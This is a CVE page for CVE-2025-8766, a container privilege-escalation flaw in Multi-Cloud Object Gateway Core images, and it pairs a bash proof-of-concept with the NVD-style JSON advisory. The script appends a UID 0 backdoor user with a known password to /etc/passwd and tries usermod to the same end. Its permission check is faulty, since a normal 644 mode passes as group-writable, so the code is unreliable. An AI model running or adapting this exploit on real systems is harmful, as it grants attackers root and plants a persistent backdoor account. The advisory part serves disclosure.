CVE-2025-8766

#!/bin/bash # CVE-2025-8766 PoC - Container Privilege Escalation via /etc/passwd # This PoC demonstrates how a non-root user can gain root privileges # by modifying /etc/passwd when it has group-writable permissions echo "[+] CVE-2025-8766 Container Privilege Escalation PoC" echo "[+] Checking /etc/passwd permissions..." # Check current user CURRENT_USER=$(whoami) CURRENT_UID=$(id -u) CURRENT_GID=$(id -g) echo "[*] Current user: $CURRENT_USER (UID: $CURRENT_UID, GID: $CURRENT_GID)" # Check /etc/passwd permissions PASSWD_PERMS=$(stat -c '%a' /etc/passwd 2>/dev/null || stat -f '%Lp' /etc/passwd 2>/dev/null) echo "[*] /etc/passwd permissions: $PASSWD_PERMS" # Check if /etc/passwd is group-writable if [[ "$PASSWD_PERMS" == *"2"* ]] || [[ "$PASSWD_PERMS" == *"6"* ]] || [[ "$PASSWD_PERMS" == *"7"* ]]; then echo "[+] /etc/passwd is group-writable - vulnerability may be present" else echo "[-] /etc/passwd is not group-writable - this system may not be vulnerable" fi # Create new root user echo "[+] Attempting to create root user..." # Generate a password hash (empty password for demonstration) # In real attack, use: openssl passwd -1 -salt abc123 'password' NEW_USER="rooted" echo "[*] Adding new user with UID 0..." # Method 1: Using usermod (if available) if command -v usermod &> /dev/null; then usermod -u 0 -o -g 0 -G root $NEW_USER 2>/dev/null && echo "[+] User modified successfully with usermod" fi # Method 2: Direct /etc/passwd manipulation echo "[*] Alternatively, manually adding to /etc/passwd..." echo "${NEW_USER}:x:0:0:root:/root:/bin/bash" >> /etc/passwd 2>/dev/null && echo "[+] Entry added to /etc/passwd" # Set password for the new user echo "rooted:password" | chpasswd 2>/dev/null && echo "[+] Password set for new user" echo "[+] PoC completed. Try: su rooted"

{"cve": {"id": "CVE-2025-8766", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:53:56.157", "lastModified": "2026-03-16T14:54:11.293", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A container privilege escalation flaw was found in certain Multi-Cloud Object Gateway Core images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container"}, {"lang": "es", "value": "Se encontró una falla de escalada de privilegios de contenedor en ciertas imágenes de Multi-Cloud Object Gateway Core. Este problema se origina en la creación del archivo /etc /passwd con permisos de escritura para el grupo durante el tiempo de compilación. En ciertas condiciones, un atacante que puede ejecutar comandos dentro de un contenedor afectado, incluso como un usuario no-root, puede aprovechar su pertenencia al grupo root para modificar el archivo /etc /passwd. Esto podría permitir al atacante añadir un nuevo usuario con cualquier UID arbitrario, incluyendo UID 0, lo que llevaría a privilegios de root completos dentro del contenedor."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-8766", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387265", "source": "[email protected]"}]}}